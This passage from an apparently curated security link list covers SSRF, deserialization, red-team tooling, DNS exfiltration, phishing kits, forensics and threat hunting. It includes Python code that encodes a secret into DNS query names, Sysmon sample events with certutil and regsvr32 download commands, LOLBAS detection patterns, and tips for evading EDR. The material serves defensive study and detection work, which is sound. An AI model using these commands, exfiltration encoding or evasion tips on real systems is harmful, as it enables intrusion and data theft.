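    addrs = resolve(host)
    return bool(addrs) and not any(is_internal(a) for a in addrs)   # unresolvable -> fail closed

if __name__ == "__main__":
    for u in ["https://api.example.com/v1", "https://api.example.com@attacker.net/",
              "http://2852039166/", "http://[::ffff:169.254.169.254]/", "http://rebind.attacker.net/"]:
        print(f"{naive_is_allowed(u)!s:5} {hardened_is_allowed(u, ALLOWED_HOSTS)!s:5} {u}")
```

Two details matter in practice beyond what the block shows: the client must connect to exactly the address that was checked (pin it, or resolve once and pass the IP with a Host header), and every redirect hop needs the same check, since `http://good.example` redirecting to `http://169.254.169.254/` is the most common way the string-level allow-list is defeated.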
- XXE:
- Out of Band XXE in an E-commerce IOS app
- Comprehensive Guide on XXE Injection
- XMLDecoder payload generator: A simple python script to generate XML payloads works for XMLDecoder based on ProcessBuilder and Runtime exec.
- Enjoying my first blind xxe experience
- XXE
- dtd-finder: List DTDs and generate XXE payloads using those local DTDs.
- New XML technique! Encode any DTD/XML inside an internal entity, and fly under WAF radars!
- Serialization:
- ysoserial: A proof-of-concept tool for generating payloads that exploit unsafe Java object deserialization.
- SerialVersionUID in Java
- Java Serialization Magic Methods And Their Uses With Example
- Apache Tomcat Deserialization of Untrusted Data RCE (CVE-2020-9484), Tomcat code: java/org/apache/naming/factory/BeanFactory.java - good to use for JRMI abuse
- CVE-2020-9484-Mass-Scan
- Exploiting JNDI Injections in Java
- How to exploit Liferay CVE-2020-7961 : quick journey to PoC
- How I Hacked Facebook Again! Unauthenticated RCE on MobileIron MDM
- Serialization: the big threat
- marshalsec: Turning your data into code execution
- SerializationDumper: A tool to dump Java serialization streams in a more human readable form.
- owaspsd-deserialize-my-shorts: Slide deck from OWASP SD Talk "Deserialize My Shorts: Or How I Learned to Start Worrying and Hate Java Object Deserialization"
- Orange: How I Chained 4 vulnerabilities on GitHub Enterprise, From SSRF Execution Chain to RCE!
- code white | Blog: Liferay Portal JSON Web Service RCE Vulnerabilities
- GraphQL: Common vulnerabilities & how to exploit them. apis.guru for GraphQL: represent any GraphQL API as an interactive graph.
- CSM_Pocs: Cisco Security Manager is an enterprise-class security management application that provides insight into and control of Cisco security and network devices.
- DSSS, Damn Small SQLi Scanner is a fully functional SQL injection vulnerability scanner (supporting GET and POST parameters) written in under 100 lines of code.
- Garud: An automation tool that scans sub-domains, sub-domain takeover and then filters out xss, ssti, ssrf and more injection point parameters.
- httpx: a fast and multi-purpose HTTP toolkit that runs multiple probers using the retryablehttp library; it is designed to keep results reliable as the thread count increases.
- waybackurls: Fetch all the URLs that the Wayback Machine knows about for a domain
- Easily Identify Malicious Servers on the Internet with JARM
- REST Assured: Penetration Testing REST APIs Using Burp Suite:
- Awesome Burp Extensions: A curated list of amazingly awesome Burp Extensions
- BurpSuiteHTTPSmuggler: A Burp Suite extension to help pentesters to bypass WAFs or test their effectiveness using a number of techniques
- AutoRepeater: Automated HTTP Request Repeating With Burp Suite
- privatecollaborator: A script for installing private Burp Collaborator with free Let's Encrypt SSL-certificate
- Deploying a private Burp Collaborator server
- Burp Collaborator Server docker container with LetsEncrypt certificate: This repository includes a set of scripts to install a Burp Collaborator Server in a docker environment, using a LetsEncrypt wildcard certificate. The objective is to simplify as much as possible the process of setting up and maintaining the server.
- SELF-HOSTED BURP COLLABORATOR FOR FUN AND PROFIT: The Burp Suite Collaborator is a valuable tool for penetration testers and bug bounty hunters. It basically gives you unique subdomains and logs all interactions (DNS, HTTP(S), SMTP(S)) towards the subdomains. This can be used for example to detect SSRF-vulnerabilities and exfiltrate data.
- AES-Killer v3.0: Burp Plugin To Decrypt AES Encrypted Traffic Of Mobile Apps On The Fly
- Femida-xss: Automated blind-xss search for Burp Suite
- dotNetBeautifier: A BurpSuite extension for beautifying .NET message parameters and hiding some of the extra clutter that comes with .NET web apps (i.e. __VIEWSTATE).
- Java-Deserialization-Scanner: All-in-one plugin for Burp Suite for the detection and the exploitation of Java deserialization vulnerabilities.
- JavaSerialKiller: Burp extension to perform Java Deserialization Attacks.
- BurpBounty: Burp Bounty (Scan Check Builder in the BApp Store) is a Burp Suite extension that lets you build your own active and passive scanner checks.
- How to install and use Burp Suite as an HTTPS proxy on Ubuntu 14.04
- BurpExtension-WhatsApp-Decryption-CheckPoint
- InQL Scanner: A Burp Extension for GraphQL Security Testing.
- PII-Identifier: Burp Extension to identify PII data
- 403Bypasser: Burp Suite extension to bypass 403-restricted directories
- Awesome Red Teaming
- DumpsterFire: "Security Incidents In A Box!" A modular, menu-driven, cross-platform tool for building customized, time-delayed, distributed security events. Easily create custom event chains for Blue Team drills and sensor / alert mapping. Red Teams can create decoy incidents, distractions, and lures to support and scale their operations. Build event sequences ("narratives") to simulate realistic scenarios and generate corresponding network and filesystem artifacts.
- Machine Learning for Red Teams, Part 1
- Flying under the radar: Hack into a "highly protected" company without getting caught
- demiguise: HTA encryption tool for RedTeams
- Sn1per: Automated pentest framework for offensive security experts
- jenkins-shell: Automating Jenkins Hacking using Shodan API
- Red Team's SIEM: easy deployable tool for Red Teams used for tracking and alarming about Blue Team activities as well as better usability in long term operations.
- The-Hacker-Playbook-3-Translation: a Chinese translation of The Hacker Playbook 3.
- How Do I Prepare to Join a Red Team?
- Red Team & Physical Entry Gear
- Red Team Techniques: Gaining access on an external engagement through spear-phishing
- Phantom Tap (PhanTap): an ‘invisible’ network tap aimed at red teams.
- So You Want to Run a Red Team Operation: I built a red team for a Forbes 30 company, and now I am sharing some pointers to help you build one in your organization.
- Alternative C2 for Red Teamers: Koadic Command & Control Framework. Koadic C3 COM Command & Control - JScript RAT
- Tuning tip: if you plan to drop a dll and load directly via macro from within office (winword or excel), use the following path %localappdata%\assembly\tmp<rand>\a.b.c.dll (it's a busy tmp folder and I doubt EDRs will notify on every file creation in that folder)
- In-Memory-Only ELF Execution (Without tmpfs): In which we run a normal ELF binary on Linux without touching the filesystem (except /proc).
- A Red Teamer's guide to pivoting
- caldera: Automated Adversary Emulation.
- BankSecurity - Red_Team: Some scripts useful for red team activities
- FIN6 Adversary Emulation
- Red-Teaming-Toolkit: A collection of open source and commercial tools that aid in red team operations.
- RedFile: A flask wsgi application that serves files with intelligence, good for serving conditional RedTeam payloads
- Choose Your Own Red Team Adventure
- Red Tip #415: STATUS_PASSWORD_MUST_CHANGE when trying an AD account? Use “smbpasswd -r domain.fqdn -U username” to change the password so you can use the account.
- Red Team Tactics: Hiding Windows Services
- AQUARMOURY: This is a tool suite consisting of miscellaneous offensive tooling aimed at red teamers/penetration testers to primarily aid in Defense Evasion TA0005
- Prelude Operator: is the first intelligent and autonomous platform built to attack, defend and train your critical assets through continuous red teaming. repo
- 0xsp Mongoose Red for Windows: a framework for cybersecurity simulation and red teaming operations, Windows auditing for newer vulnerabilities, misconfigurations and privilege escalation attacks, replicating the tactics and techniques of an advanced adversary in a network.
- Macrome: Excel Macro Document Reader/Writer for Red Teamers & Analysts
- Cobalt Strike: is software for Adversary Simulations and Red Team Operations. 4.2 release notes
- CrossC2: generate CobaltStrike's cross-platform payload
- Cobalt-Strike-CheatSheet: Some notes and examples for cobalt strike's functionality
- Octopus: Open source pre-operation C2 server based on python and powershell
- Covenant: Covenant is a collaborative .NET C2 framework for red teamers.
- Purple Cloud: An Infrastructure as Code (IaC) deployment of a small Active Directory pentest lab in the cloud. The deployment simulates a semi-realistic corporate enterprise Active Directory with a DC and endpoints. Purple team goals include blue team detection capabilities and R&D for detection engineering new approaches. On KitPloit
- dnstwist
- Plight At The End Of The Tunnel
- dref: DNS Rebinding Exploitation Framework
- dns-rebind-toolkit: A front-end JavaScript toolkit for creating DNS rebinding attacks.
- Bypass firewalls by abusing DNS history: Firewall bypass script based on DNS history records. This script will search for DNS A history records and check if the server replies for that domain. Handy for bugbounty hunters.
- dnstwist: Domain name permutation engine for detecting typo squatting, phishing and corporate espionage
- Can I take over XYZ?: a list of services and how to claim (sub)domains with dangling DNS records.
- SubR3con: a Python script that uses Sublist3r to enumerate all subdomains of a target and then checks their status codes for possible subdomain takeover. Works well together with Subover.go
- TakeOver-v1: extracts the CNAME records of all subdomains at once, saving researcher time and increasing the chance of finding a subdomain takeover vulnerability.
- subzy: Subdomain takeover vulnerability checker.
- Subdomain Takeover Scanner
- subdomain-takeover: SubDomain TakeOver Scanner by 0x94.
- DNSCrypt is a protocol that authenticates communications between a DNS client and a DNS resolver. It prevents DNS spoofing. It uses cryptographic signatures to verify that responses originate from the chosen DNS resolver and haven’t been tampered with. dnscrypt-proxy 2, resolvers and docker image.
- pdns-qof: Passive DNS Common Output Format.
- dnsdbq: DNSDB API Client, C Version.
- DNS Logging:
- DNSObserver: A handy DNS service written in Go to aid in the detection of several types of blind vulnerabilities. It monitors a pentester's server for out-of-band DNS interactions and sends lookup notifications via Slack. Discover Blind Vulnerabilities with DNSObserver: an Out-of-Band DNS Monitor
- Unbound DNS Blacklist
- subjack: Subdomain Takeover tool written in Go
- SAD DNS: an off-path attacker can inject a malicious DNS record into a DNS cache (e.g., in BIND, Unbound, dnsmasq).
- dog: Command-line DNS client
- Script for searching the extracted firmware file system for goodies!
- DKMC - Dont kill my cat: Malicious payload evasion tool
- Tunna is a set of tools which will wrap and tunnel any TCP communication over HTTP. It can be used to bypass network restrictions in fully firewalled environments.
- gitleaks: Searches full repo history for secrets and keys
- Twitter Scraper
- BloodHound: Six Degrees of Domain Admin, and a Python based ingestor for BloodHound
- tinfoleak (github): the most complete open-source tool for Twitter intelligence analysis
- Social IDs: get user IDs from social network handles
- SpookFlare: Meterpreter loader generator with multiple features for bypassing client-side and network-side countermeasures.
- Photon: Incredibly fast crawler which extracts urls, emails, files, website accounts and much more.
- Extracting data from an EMV (Chip-And-Pin) Card with NFC technology
- accountanalysis: This tool enables you to evaluate Twitter accounts. For example how automated they are, how many Retweets they post, or which websites they link to most often.
- How to get authentication key from SNMPv3 packets
- AtomicTestsCommandLines.txt: Atomic Tests - All Command Lines - Replace Input Arguments #{input_argument} - More Soon
- whois | GTFOBins: hangs waiting for the remote peer to close the socket. github
- Browsers affected by the History API DoS
- PacketWhisper: Stealthily Exfiltrate Data And Defeat Attribution Using DNS Queries And Text-Based Steganography
- Using Google Analytics for data extraction
- Exfiltrating credentials via PAM backdoors & DNS requests
- Building simple DNS endpoints for exfiltration or C&C
- CheckPlease: Sandbox evasion modules written in PowerShell, Python, Go, Ruby, C, C#, Perl, and Rust.
- okhttp-peer-certificate-extractor: This tool extracts peer certificates from given certificates.
- DET: (extensible) Data Exfiltration Toolkit (DET)
- awesome-python-login-model: login automation for web scraping.
- Hamburglar: collect useful information from urls, directories, and files.
- Giggity: grab hierarchical data about a github organization, user, or repo.
- Living Off The Land Binaries and Scripts (and also Libraries) - github
- Windows TCPIP Finger Command: C2 Channel and Bypassing Security Software
- Living Off Windows Land – A New Native File “downldr”
- Ttdinject.exe: used by Windows 1809 and newer for Time Travel Debugging (underlying call of tttracer.exe)
- Exfiltrate Like a Pro: Using DNS over HTTPS as a C2 Channel
- Awesome Asset Discovery: List of Awesome Asset Discovery Resources
- Cloakify-Factory: A Data Exfiltration Tool that uses Text-Based Steganography.
- hakrawler: Simple, fast web crawler designed for easy, quick discovery of endpoints and assets within a web application. A Fast Web Crawler for Hackers
- Chameleon: A tool for evading Proxy categorisation.
- DNSExfiltrator: Data exfiltration over DNS request covert channel
- Data Exfiltration using Linux Binaries
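Added example (not code from DNSExfiltrator or the DNS endpoint posts above) covering both the "build a DNS endpoint" and the exfiltration items: the query-name encoding a DNS exfil client uses, the reassembly the attacker's authoritative server does, and two hunting heuristics over the resulting names. Domain names, thresholds and the secret are constructed.

```python
import base64
import math

MAX_LABEL = 63     # RFC 1035 label limit
MAX_NAME = 253     # practical limit for a full name

def encode_chunks(data, domain, chunk=30):
    """Sender: split data into queries '<seq>.<base32 labels>.<domain>'. 30 raw bytes become
    48 base32 characters, which fit in one label; bigger chunks are split across labels."""
    names = []
    for seq, offset in enumerate(range(0, len(data), chunk)):
        b32 = base64.b32encode(data[offset:offset + chunk]).decode().rstrip("=").lower()
        labels = [b32[i:i + MAX_LABEL] for i in range(0, len(b32), MAX_LABEL)]
        name = ".".join([str(seq)] + labels + [domain])
        if len(name) > MAX_NAME:
            raise ValueError("chunk too large for one query name")
        names.append(name)
    return names

def decode_queries(names, domain):
    """Receiver (authoritative for `domain`): reassemble from query names, in any order."""
    suffix = "." + domain
    pieces = {}
    for name in names:
        if not name.endswith(suffix):
            continue
        seq, *labels = name[:-len(suffix)].split(".")
        b32 = "".join(labels).upper()
        b32 += "=" * (-len(b32) % 8)                  # restore the padding the sender stripped
        pieces[int(seq)] = base64.b32decode(b32)
    return b"".join(pieces[k] for k in sorted(pieces))

def shannon_entropy(s):
    if not s:
        return 0.0
    return -sum((s.count(c) / len(s)) * math.log2(s.count(c) / len(s)) for c in set(s))

def zone_of(name, depth=2):
    """Split 'a.b.example.com' into ('example.com', 'a.b'); depth=2 is a simplification
    (a public-suffix list is needed for zones such as co.uk)."""
    labels = name.rstrip(".").lower().split(".")
    return ".".join(labels[-depth:]), ".".join(labels[:-depth])

def suspicious_name(name, min_len=40, min_entropy=3.0):
    """Per-query heuristic: a long, high-entropy subdomain part."""
    _, sub = zone_of(name)
    return len(sub) >= min_len and shannon_entropy(sub) >= min_entropy

def noisy_zones(names, min_distinct=3):
    """Per-zone heuristic: many distinct subdomains of one zone. Short chunks evade the
    per-name check; the volume does not."""
    seen = {}
    for name in names:
        zone, sub = zone_of(name)
        seen.setdefault(zone, set()).add(sub)
    return {zone for zone, subs in seen.items() if len(subs) >= min_distinct}

# Constructed samples: benign lookups plus an exfiltration of a small secret.
BENIGN_QUERIES = ["www.example.com", "mail.example.com", "cdn-1234.static.example.net",
                  "api.github.com", "login.microsoftonline.com"]
SECRET = b"user=admin\npassword=hunter2\ncard=4539148803436467\nnote=wire 5pm\n"
EXFIL_QUERIES = encode_chunks(SECRET, "exfil.example")

if __name__ == "__main__":
    for q in EXFIL_QUERIES:
        print(q, suspicious_name(q))
    print(noisy_zones(BENIGN_QUERIES + EXFIL_QUERIES))
```

On the defender's side the two heuristics are complementary: a tool that keeps chunks short (or uses a wide alphabet and real-looking labels) slips under the per-name entropy check, but it then has to send many more queries to the same zone, which the per-zone count sees; real hunting adds the query rate per client and the NXDOMAIN ratio of the zone.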
- Exploring the WDAC Microsoft Recommended Block Rules: kill.exe. lolbin/lolbas
- I found a way to download arbitrary files with AppInstaller.exe (signed by MS). start ms-appinstaller://?source= lolbin/lolbas
- Payloads Collection by @alra3ees:
- Command Injection Payload List
- Cross Site Scripting ( XSS ) Vulnerability Payload List
- XML External Entity (XXE) Injection Payload List
- SQL Injection Payload List
- RFI/LFI Payload List.
- Open Redirect Payload List
- Payload Delivery for DevOps: Building a Cross-Platform Dropper Using the Genesis Framework, Metasploit and Docker. code
- (pt-br) Creating reverse shell payloads with MSFVenom
- LaTex Injection
- Phishing on Twitter
- evilginx2: Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies, allowing for the bypass of 2-factor authentication.
- shellphish: Phishing Tool for 18 social media: Instagram, Facebook, Snapchat, Github, Twitter, Yahoo, Protonmail, Spotify, Netflix, Linkedin, Wordpress, Origin, Steam, Microsoft, InstaFollowers, Gitlab, Pinterest
- pompa: Fully-featured spear-phishing toolkit - web front-end.
- Modlishka: a flexible and powerful reverse proxy that will take your phishing campaigns to the next level (with minimal effort required from your side).
- Using phishing tools against the phishers — and uncovering a massive Binance phishing campaign.
- Lure: User Recon Automation for GoPhish
- PhishingKitTracker: An extensible and freshly updated collection of phishingkits for forensics and future analysis topped with simple stats.
- Cracking Linux Full Disk Encryption (LUKS) with hashcat - The Forensic way!
- O-Saft: OWASP SSL advanced forensic tool
- PcapXray - A Network Forensics Tool - To visualize a Packet Capture offline as a Network Diagram including device identification, highlight important communication and file extraction
- swap_digger is a tool used to automate Linux swap analysis during post-exploitation or forensics
- The Sleuth Kit® (TSK) is a library and collection of command line digital forensics tools that allow you to investigate volume and file system data
- Invoke-LiveResponse
- Linux Forensics
- CDQR: The Cold Disk Quick Response (CDQR) tool is a fast and easy to use forensic artifact parsing tool that works on disk images, mounted drives and extracted artifacts from Windows, Linux and MacOS devices
- mac_apt: macOS Artifact Parsing Tool
- MacForensics: Repository of scripts for processing various artifacts from macOS (formerly OSX).
- imago-forensics: Imago is a python tool that extract digital evidences from images.
- remedi-infrastructure: setup and deployment code for setting up a REMEDI machine translation cluster
- Tsurugi Linux is a new DFIR open source project that is and will be totally free, independent without involving any commercial brand
- libelfmaster: Secure ELF parsing/loading library for forensics reconstruction of malware, and robust reverse engineering tools
- usbrip (derived from "USB Ripper", not "USB R.I.P." 😲) is an open source forensics tool with CLI interface that lets you keep track of USB device artifacts (aka USB event history, "Connected" and "Disconnected" events) on Linux machines.
- Digital Forensics and Incident Response: This post is inspired by all the hard working DFIR, and more broadly security professionals, who have put in the hard yards over the years to discuss in depth digital forensics and incident response.
- KAPE - Kroll Artifact Parser And Extractor: Find, collect and process forensically useful artifacts in minutes. blog post. KAPE docs and KAPE Files
- AVML (Acquire Volatile Memory for Linux).
- turbinia: Automation and Scaling of Digital Forensics Tools
- Eric Zimmerman's Tools
- MacQuisition: A powerful, 4-in-1 forensic imaging software solution for Macs for triage, live data acquisition, targeted data collection, and forensic imaging.
- Kuiper: Digital Forensics Investigation Platform
- File signatures:
- PowerForensics: PowerForensics provides an all in one platform for live disk forensic analysis. Powershell
- OfficeForensicTools: A set of tools for collecting forensic information.
- CAINE: Computer Aided INvestigative Environment. Is an Italian GNU/Linux live distribution created as a Digital Forensics project.
- e-Fense Helix 3
- black arch
- List of Live Distributions for Computer Forensics
- volatility: An advanced memory forensics framework
- Volatility profiles for Linux and Mac OS X
- Building a profile for Volatility
- AutoVolatility: Run several volatility plugins at the same time.
- Memory Forensics and Analysis Using Volatility
- Volatility, my own cheatsheet (Part 1): Image Identification
- First steps to volatile memory analysis
- MITRE ATT&CK:
- (pt-br) Analyzing threats with MITRE ATT&CK Navigator
- ATT&CK™ Navigator: Web app that provides basic navigation and annotation of ATT&CK matrices github.
- Atomic Threat Coverage: Actionable analytics designed to combat threats based on MITRE's ATT&CK.
- atomic-red-team: Small and highly portable detection tests based on MITRE's ATT&CK.
- Welcome to Stealthbits Attack Catalog: Adversary techniques for credential theft and data compromise.
- DeTTECT: Detect Tactics, Techniques & Combat Threats
- Awesome Honeypots: A curated list of awesome honeypots, plus related components and much more, divided into categories such as Web, services, and others, with a focus on free and open source projects.
- Blue Team Fundamentals
- Blue Team fundamentals Part Two: Windows Processes.
- Sooty: The SOC Analysts all-in-one CLI tool to automate and speed up workflow.
- Profile Sysmon logs to discover which LOLBAS binaries have run and what their command line arguments were
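Added example, not the post's own code: a Python profile of Sysmon Event ID 1 (process creation) records over a constructed sample, listing per-LOLBAS-binary command lines, parents and users, then flagging argument patterns modelled on the abuse cases LOLBAS documents and any launch from an Office parent. The LOLBAS subset and patterns are an excerpt to be extended from the project's data; the events are constructed.

```python
import re

# Constructed Sysmon Event ID 1 records, flattened the way a forwarder ships them
# (json.loads on one event per line yields the same dicts). Field names are Sysmon's.
SAMPLE_EVENTS = [
    {"EventID": 1, "User": "CORP\\jdoe", "ParentImage": "C:\\Windows\\System32\\cmd.exe",
     "Image": "C:\\Windows\\System32\\certutil.exe",
     "CommandLine": "certutil.exe -urlcache -split -f http://198.51.100.7/a.txt C:\\Users\\Public\\a.exe"},
    {"EventID": 1, "User": "CORP\\build", "ParentImage": "C:\\Windows\\System32\\cmd.exe",
     "Image": "C:\\Windows\\System32\\certutil.exe",
     "CommandLine": "certutil -hashfile setup.msi SHA256"},
    {"EventID": 1, "User": "CORP\\jdoe",
     "ParentImage": "C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE",
     "Image": "C:\\Windows\\System32\\regsvr32.exe",
     "CommandLine": "regsvr32 /s /n /u /i:http://198.51.100.7/x.sct scrobj.dll"},
    {"EventID": 1, "User": "CORP\\jdoe", "ParentImage": "C:\\Windows\\explorer.exe",
     "Image": "C:\\Windows\\System32\\rundll32.exe",
     "CommandLine": "rundll32.exe shell32.dll,Control_RunDLL"},
    {"EventID": 1, "User": "CORP\\jdoe", "ParentImage": "C:\\Windows\\explorer.exe",
     "Image": "C:\\Windows\\System32\\notepad.exe", "CommandLine": "notepad.exe notes.txt"},
    {"EventID": 3, "Image": "C:\\Windows\\System32\\certutil.exe", "DestinationIp": "198.51.100.7"},
]

# Excerpt of the LOLBAS list (real entries) with argument patterns modelled on the documented
# abuse cases (download/decode, Squiblydoo, script: URLs, BITS transfers, remote MSI).
LOLBAS = {"certutil.exe", "regsvr32.exe", "rundll32.exe", "mshta.exe", "bitsadmin.exe", "msiexec.exe"}
ABUSE_PATTERNS = {
    "certutil.exe": re.compile(r"-urlcache|-decode|-encode", re.I),
    "regsvr32.exe": re.compile(r"/i:https?://|scrobj\.dll", re.I),
    "rundll32.exe": re.compile(r"javascript:|\.dll,\s*\w+\s+https?://", re.I),
    "mshta.exe": re.compile(r"https?://|javascript:|vbscript:", re.I),
    "bitsadmin.exe": re.compile(r"/transfer|/addfile", re.I),
    "msiexec.exe": re.compile(r"/i\s+https?://|/q\S*\s+https?://", re.I),
}
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}

def basename(path):
    return path.rsplit("\\", 1)[-1].lower()

def profile(events):
    """Per LOLBAS binary: how often it ran, with which command lines, parents and users.
    Read this baseline before writing a rule: the -hashfile run is normal in this sample."""
    prof = {}
    for ev in events:
        if ev.get("EventID") != 1:
            continue
        name = basename(ev["Image"])
        if name not in LOLBAS:
            continue
        entry = prof.setdefault(name, {"count": 0, "cmdlines": set(), "parents": set(), "users": set()})
        entry["count"] += 1
        entry["cmdlines"].add(ev["CommandLine"])
        entry["parents"].add(basename(ev["ParentImage"]))
        entry["users"].add(ev["User"])
    return prof

def flag_abuse(events):
    """Events whose arguments match a documented abuse pattern or whose parent is an Office app."""
    hits = []
    for ev in events:
        if ev.get("EventID") != 1 or basename(ev["Image"]) not in LOLBAS:
            continue
        name = basename(ev["Image"])
        reasons = []
        pattern = ABUSE_PATTERNS.get(name)
        if pattern and pattern.search(ev["CommandLine"]):
            reasons.append("suspicious arguments")
        if basename(ev["ParentImage"]) in OFFICE_PARENTS:
            reasons.append("launched by Office")
        if reasons:
            hits.append((name, reasons, ev["CommandLine"]))
    return hits

if __name__ == "__main__":
    for name, entry in profile(SAMPLE_EVENTS).items():
        print(name, entry["count"], sorted(entry["parents"]), sorted(entry["users"]))
    for hit in flag_abuse(SAMPLE_EVENTS):
        print("ALERT", hit)
```

The profile is the part that keeps the rule honest: `certutil -hashfile` from a build account is everyday noise, so a rule keyed on the image name alone would page on it, while keying on the argument pattern and the parent process flags the download and the Word-spawned Squiblydoo and nothing else in this sample.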
- Your detections aren't working
- elastalert: Easy & Flexible Alerting With ElasticSearch
- Technical Approaches to Uncovering and Remediating Malicious Activity: Alert (AA20-245A).
- EVTX-ATTACK-SAMPLES: Windows Events Attack Samples slides
- Sysmon 12.0 — EventID 24: Sysmon 12 is out, with a new event ID: number 24. A very useful new feature, clipboard monitoring.
- Windows Advanced Audit Policy Map to Event IDs
- takuan: a system service that parses logs and detects noisy attackers in order to build a blacklist database of known cyber offenders.
- CobaltStrikeScan: Scan files or process memory for CobaltStrike beacons and parse their configuration.
- Cobalt Strike Beacon Analysis. python decoder: 1768k
- How to Design Detection Logic - Part 1
- Mitigating Pass-the-Hash and Other Credential Theft
- Evilginx-ing into the cloud: How we detected a red team attack in AWS
- Wireshark For Network Threat Hunting: Creating Filters - Active Countermeasures
- Cisco Talos blog: Adwind Dodges AV via DDE
- strelka: Scanning files at scale with Python and ZeroMQ
- Threat-Hunting: Personal compilation of APT malware from whitepaper releases, documents and own research
- ThreatHunter-Playbook: A Threat hunter's playbook to aid the development of techniques and hypothesis for hunting campaigns.
- HELK - The Hunting ELK: The Hunting ELK or simply the HELK is one of the first open source hunt platforms with advanced analytics capabilities such as SQL declarative language, graphing, structured streaming, and even machine learning via Jupyter notebooks and Apache Spark over an ELK stack.
- mordor: Re-play Adversarial Techniques.
- ioc_writer: Provide a python library that allows for basic creation and editing of OpenIOC objects.
- 3 of the main observed false positives I've learned while hunting for cmd.exe as a child proc of rundll32.exe (still one of the top 3 preferred hosts for backdoors implemented as a DLL or alike) #threathunting (understanding this kind of FPs is as important as learning new/old TTP traces). For #redteam you can blend in by mimicking case 1: naming your module something like MSI*.tmp and using a similar export function name (DLL path usually under c:\users* so no high priv needed).
- thethe: Simple, shareable, team-focused and expandable threat hunting environment. The Threat Hunting Environment
- Mordor PCAPs 📡:
- cyber-threat-response-clinic
- opencti: Open Cyber Threat Intelligence Platform
- securityonion: Security Onion 2.0 (Pre-release) - Linux distro for threat hunting, enterprise security monitoring, and log management
- TheHive: a Scalable, Open Source and Free Security Incident Response Platform
- TheHive4py: Python API Client for TheHive
- TheHiveIRPlaybook is a collection of TheHive case templates used for Incident Response
- Cortex-Analyzers : Cortex Analyzers Repository
- Nimbus Network Traffic Analyzer Augmented with our world-class threat intelligence.
- ja3 is a standard for creating SSL client fingerprints in an easy to produce and shareable way.
- Threat Hunting Process
- Threat Hunting Principles
- Some repos from hunters-forge: API-To-Event, notebooks-forge, BloodHound Notebooks
- Yeti: Your Everyday Threat Intelligence
- Watcher: Open Source Cybersecurity Threat Hunting Platform. Developed with Django & React JS.
- Network analysis:
- traffic-analysis-workshop and wireshark-tutorial-decrypting-HTTPS-traffic
- Wireshark Tutorial: Exporting Objects from a Pcap
- Hex Packet Decoder: Hex Packet Decoder provides an HTTP API for you to parse network packets.
- Packetor: Packetor is an online hex-dump packet analyzer / decoder.
- Lookup Before You Go-Go...Hunting.
- Insider Threat Hunting and It's all in the numbers.
- Wazuh: is a free, open source and enterprise-ready security monitoring solution for threat detection, integrity monitoring, incident response and compliance. repo and ansible
- Hunting the Hunters - RCE in Covenant C2. PoC Video
- Passive SSH: Passive SSH is an open source framework composed of a scanner and server to store and lookup the SSH keys and fingerprints per host (IPv4/IPv6/onion). repo: passive-ssh
- MISP (core software) - Open Source Threat Intelligence Platform (formerly known as Malware Information Sharing Platform)
- MISP galaxy: Clusters and elements to attach to MISP events or attributes (like threat actors)
- DigitalSide Threat-Intel: Threat-Intel repository. API
- MISP-sizer: Sizing your MISP instance.
- MISP CERT.br
- misp-warninglist: Warning lists to inform users of MISP about potential false-positives or other information in indicators
- MISP-maltego: Set of Maltego transforms to interface with a MISP Threat Sharing instance, and also to explore the whole MITRE ATT&CK dataset.
- misp-modules: Modules for expansion services, import and export in MISP
- misp-taxonomies: Taxonomies used in MISP taxonomy system and can be used by other information sharing tool.
- PyMISP: Python library using the MISP Rest API
- APT33: More than a Dozen Obfuscated APT33 Botnets Used for Extreme Narrow Targeting. APT33, the Iranian hacking group behind Shamoon, built its own VPN network.
- Dismantling a fileless campaign: Microsoft Defender ATP’s Antivirus exposes Astaroth attack
- Adversary Reports: The latest whitepapers, solution briefs, and datasheets from Dragos
- APT29 targets COVID-19 vaccine development
- What is APT28's Drovorub Malware?. FBI and NSA report
- Dispatches from Drovorub: Network Threat Hunting for Russia GRU GTsSS' Malware at Scale
- Tracking A Malware Campaign Through VT
- More Evidence of APT Hackers-for-Hire Used for Industrial Espionage
- APT41: US Charges Five Alleged Members of APT41 Group
- Analysis Report (AR20-268A)
- CYPRESS - Cyber Planning for Response and Recovery Study 2020 FERC, NERC and REs Report.
- CHIMBORAZO TA505
- Threat Group Cards: A Threat Actor Encyclopedia.
- sophos labs IoCs: Sophos-originated indicators-of-compromise from published reports
- DailyIOC: IOC from articles, tweets for archives
- CVE-2020-1472 Zerologon IoCs
- iocs: Indicators from Unit 42 Public Reports
- Threat intelligence and threat detections: Threat intelligence and threat detection indicators (IOC, IOA).
- APT_Digital_Weapon: Indicators of compromise (IOCs) collected from public resources and categorized by Qi-AnXin.
- Ryuk Speed Run, 2 Hours to Ransom
- What did DeathStalker hide between two ferns?
- Sigma: Generic Signature Format for SIEM Systems
- Events Heatmap
- RedELK: Red Team's SIEM - easy deployable tool for Red Teams used for tracking and alarming about Blue Team activities as well as better usability in long term operations.
- plaso: Super timeline all the things.
- Heatmaps Make Ops Better
- graylog-guide-snort: How to send structured Snort IDS alert logs into Graylog
- TALR: Threat Alert Logic Repository
- Auditing Continuously vs. Monitoring Continuously
- Logsspot: a project created to help cybersec folks understand what kind of information a security technology can present and how to use it to improve detection and intelligence.
- Corsair: Python wrapper for some NSOC tools. Corsair aims to implement RESTFul wrappers for different tools commonly used by Network and Security Operations Centers (NSOC).
- Scalable Logging and Tracking
- Logs were our lifeblood. Now they're our liability.
- Using Flume to Collect Apache 2 Web Server Logs
- spectx: Instantly parse and investigate raw log files
- The log/event processing pipeline you can't have
- Building a SIEM: combining ELK, Wazuh HIDS and Elastalert for optimal performance
- Here's a Splunk way to score behaviors that are derived from detections.
- Bypassing Browser Security Warnings with Pseudo Password Fields
- The 9 Lives of Bleichenbacher's CAT: New Cache ATtacks on TLS Implementations
- How To Blow Your Online Cover With URL Previews
- Nefarious LinkedIn: A look at how LinkedIn exfiltrates extension data from your browser.
- Lightnion: A light version of Tor portable to the browser.
- Puppeteer: Headless Chrome Node API. site
- uBlock Origin: An efficient blocker for Chromium and Firefox. Fast and lean.
- autochrome: This tool downloads, installs, and configures a shiny new copy of Chromium.
- BROWSERGAP: Browse anything securely; browse the web without the web browsing you.
- browsergap.ce: Simple Isolated Remote Browsers, Open Source
- Crash Chrome.
- Firefox: How a website could steal all your cookies
- Addons for Firefox:
- LinkGopher
- WebDeveloper
- IPvFoo
- DownthemAll
- SixorNot
- Uppity
- Cliget
- URLs List
- Link Redirect Trace
- Tamper Data for FF Quantum
- BuiltWith
- Wappalyzer
